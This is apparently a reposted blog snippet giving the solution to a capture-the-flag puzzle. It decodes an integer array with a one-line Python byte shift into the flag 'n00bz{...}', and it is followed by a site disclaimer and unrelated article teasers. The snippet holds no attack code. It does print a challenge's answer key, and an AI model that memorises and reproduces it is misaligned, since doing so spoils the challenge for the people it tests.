[31,63, 63, 19, 43, 44, 10, 63, 38, 16, 69, 63, 83, 16, 64, 37, 16, 69, 63, 21, 67, 92, 30, 64, 70, 16, 64, 30, 16, 1, 35, 63, 6, 21, 16, 63, 23, 16, 42, 63, 6, 16, 93, 63, 8, 16, 37, 67, 90, 66, 16, 3, 22, 68, 70, 48, 48, 48, 46]

其实很简单,前边的工作都白作了。

一句话

>>> bytes([i+79 if i<48 else i-15 for i in b])
b'n00bz{Y0u_60D_1t_60d4Mm17_1m_Pr0Ud_0f_y0U_N0W_t4K3_Re57!!!}'

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/643386.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【论文导读】- Variational Graph Recurrent Neural Networks(VGRNN)

文章目录 文章信息摘要BackgroundGraph convolutional recurrent networks (GCRN)Semi-implicit variational inference (SIVI) Variational graph recurrent neural network (VGRNN)VGRNN modelSemi-implicit VGRNN (SI-VGRNN) 文章信息 Variational Graph Recurrent Neural …

1.OpenCV 运行环境配置(Python)

一、安装Python 1.在Python官网下载Python。Download Python | Python.org 下载有点慢&#xff0c;需耐心等一等。&#xff08;用迅雷下载挺快&#xff09; 2.下载完后&#xff0c;一步一步的安装即可。我本地安装在 D:\Python\&#xff0c;路径可以自定义。安装时勾选了添加…

​selenium+python做web端自动化测试框架与实例详解教程

最近受到万点暴击&#xff0c;由于公司业务出现问题&#xff0c;工作任务没那么繁重&#xff0c;有时间摸索seleniumpython自动化测试&#xff0c;结合网上查到的资料自己编写出适合web自动化测试的框架&#xff0c;由于本人也是刚刚开始学习python&#xff0c;这套自动化框架目…

Linux操作系统的启动流程

一、&#xff08;通常&#xff09;操作系统的启动流程步骤 【关于BIOS的介绍&#xff0c;如果是操作系统小白可以参考一下百度百科的解释&#xff1a;】 通常操作系统启动的流程一般包括以下步骤&#xff1a; BIOS自检&#xff1a;计算机开机后&#xff0c;会进入Power On Se…

CMOS组合逻辑(二)

在前面介绍了静态互补CMOS逻辑&#xff0c;这里主要说明有比逻辑和动态CMOS逻辑。 CMOS组合逻辑_vtc曲线_沧海一升的博客-CSDN博客介绍了静态互补CMOS逻辑https://blog.csdn.net/qq_21842097/article/details/107456036 一、有比逻辑 1、伪NMOS 因为互补CMOS优点是全轨输出&…

WinForm——软件加载读条界面卡死问题

WinForm——软件加载读条界面卡死问题 前言一、问题现象二、测试部分代码1.Loading窗体2.加载代码Program处 三、分析原因四、解决方案代码1.Loading窗体2.加载代码Program处 前言 在制作软件开启界面&#xff0c;读条加载时&#xff0c;在Program中new了个Loading窗体&#x…

02 表达客观事物的术语

文章目录 02 表达客观事物的术语类与对象&#xff08;1&#xff09;定义与表示&#xff08;2&#xff09;类名(类的标识)&#xff08;3&#xff09;属性(attribute)属性的作用范围&#xff1a;定义属性的格式为&#xff1a; (4)操作(operation)表达操作的完整语法格式 &#xf…

帮忙投票的链接创建投票链接设置投票怎么弄的微信怎么

近些年来&#xff0c;第三方的微信投票制作平台如雨后春笋般络绎不绝。随着手机的互联网的发展及微信开放平台各项基于手机能力的开放&#xff0c;更多人选择微信投票小程序平台&#xff0c;因为它有非常大的优势。 1.它比起微信公众号自带的投票系统、传统的H5投票系统有可以图…

【CMake 入门与进阶(7)】 CMakeLists.txt 部分常用变量-续(附使用代码)

继续来学习CMakeLists.txt 常用变量 描述系统的变量 顾名思义&#xff0c;这些变量描述了系统相关的一些信息&#xff1a; 变量说明CMAKE_HOST_SYSTEM_NAME运行 cmake 的操作系统的名称&#xff08;其实就是 uname -s&#xff09;CMAKE_HOST_SYSTEM_PROCESSOR运行 cmake 的操…

Android协程

协程 文章目录 协程1.讲协程之前的一些相关概念1.并发与并行2.同步与异步3.阻塞3.1Looper的阻塞3.1.1 loop的源码3.1.2loopOnce源码3.1.3注意 3.2Looper处于死循环是否会导致ANR3.2.1ANR是什么3.2.2Looper的死循环是否会导致ANR3.2.3总结 4.挂起4.1阻塞和挂起的区别 5.多任务 2…

pytorch深度学习框架—torch.nn模块(二)

pytorch深度学习框架—torch.nn模块&#xff08;二&#xff09; 激活函数 pytorch中提供了十几种激活函数&#xff0c;常见的激活函数通常为S形激活函数&#xff08;Sigmoid&#xff09;双曲正切激活函数(Tanh) 和线性修正单元&#xff08;ReLu&#xff09;激活函数等 层对应的…

Material—— RBD(Houdini To UE)

Houdini刚体碎块导入UE&#xff0c;有两个方面需还原&#xff0c;一是材质还原&#xff0c;一是动态还原&#xff1b; 一&#xff0c;ABC to UE 材质方面&#xff0c;Houdini里的每个Primtive Group属性&#xff0c;都表示UE内的对应材质球&#xff1b;导入时勾选Find Material…

AST使用(一)

关于安装及环境配置可以看https://mp.csdn.net/mp_blog/creation/editor/131155968 下面所有案例的JS原代码如下&#xff1a; const a 3; let string "hello"; for (let i 0;i < 3;i){string "world" } console.log("string",string) …

深度学习QA之卷积神经网络

深度学习Q&A之卷积神经网络 前言1 卷积基础知识问题1 简述卷积的基本操作&#xff0c;并分析其与全连接层的区别 &#xff08;难度&#xff1a; ★ \bigstar ★&#xff09;分析与解答&#xff1a; ♣ \clubsuit ♣ 局部连接: ♣ \clubsuit ♣ 权值共享: ♣ \clubsuit ♣ 输…

ubuntu 20.04 aarch64 平台交叉编译 opencv

编译环境 win10 64 位 VMware Workstation Pro 16 虚拟机 虚拟机安装 ubuntu 20.04 opencv 版本&#xff1a; 来自 github 当前最新 4.7 目的 交叉编译 opencv&#xff0c;用于 嵌入式 aarch64 平台 下载 opencv 可以直接从 github 下载 release 版本或者 使用 git clon…

『2023北京智源大会』6月9日上午|开幕式及全体大会

『2023北京智源大会』6月9日上午|开幕式及全体大会 文章目录 一. 黄铁军丨智源研究院院长1. 大语言模型2. 大语言模型评测体系FlagEval3. 大语言模型生态(软硬件)4. 三大路线通向 AGI(另外2条路径) 二. Towards Machines that can Learn, Reason, and Plan(杨立昆丨图灵奖得主…

Spring Boot整合JPA

文章目录 一、Spring Boot整合JPA&#xff08;一&#xff09;创建Spring Boot项目JPADemo&#xff08;二&#xff09;创建ORM实体类1、创建评论实体类 - Comment2、创建文章实体类 - Article &#xff08;三&#xff09;创建自定义JpaRepository接口 - ArticleRepository&#…

【Flutter】Flutter 中处理 loading 状态

文章目录 一、引言二、在 Flutter 中处理 loading 状态三、用具体业务逻辑代码示例展示四、常见问题及解决方案五、结语 一、引言 今天我们将一起探讨在 Flutter 中如何控制 loading 状态。 Flutter&#xff0c;作为一个高效、简洁的 UI 框架&#xff0c;已经在全球范围内得到…

FPGA基础知识-数据流建模

目录 学习目标 学习内容 1.门的类型 2.门延迟 学习时间 学习小结 学习目标 学习Verilog 提供的门级原语 理解门的实例引用、门的符号以及andor&#xff0c;bufnot类型的门的真值表 学习如何根据电路的逻辑图来生成verilog描述 讲述门级设计中的上升、下降和关断延迟 …

【MyBatis学习】MyBatis操纵数据库进行查询操作 ?MyBatis与JDBC想比怎么样,赶快与我一起探索吧 ! ! !

前言: 大家好,我是良辰丫,从今天开始我们就要进入MyBatis的学习了,请君与我一起操纵数据库,MyBatis到底是什么呢?我们慢慢往下瞧! ! !&#x1f48c;&#x1f48c;&#x1f48c; &#x1f9d1;个人主页&#xff1a;良辰针不戳 &#x1f4d6;所属专栏&#xff1a;javaEE进阶篇之…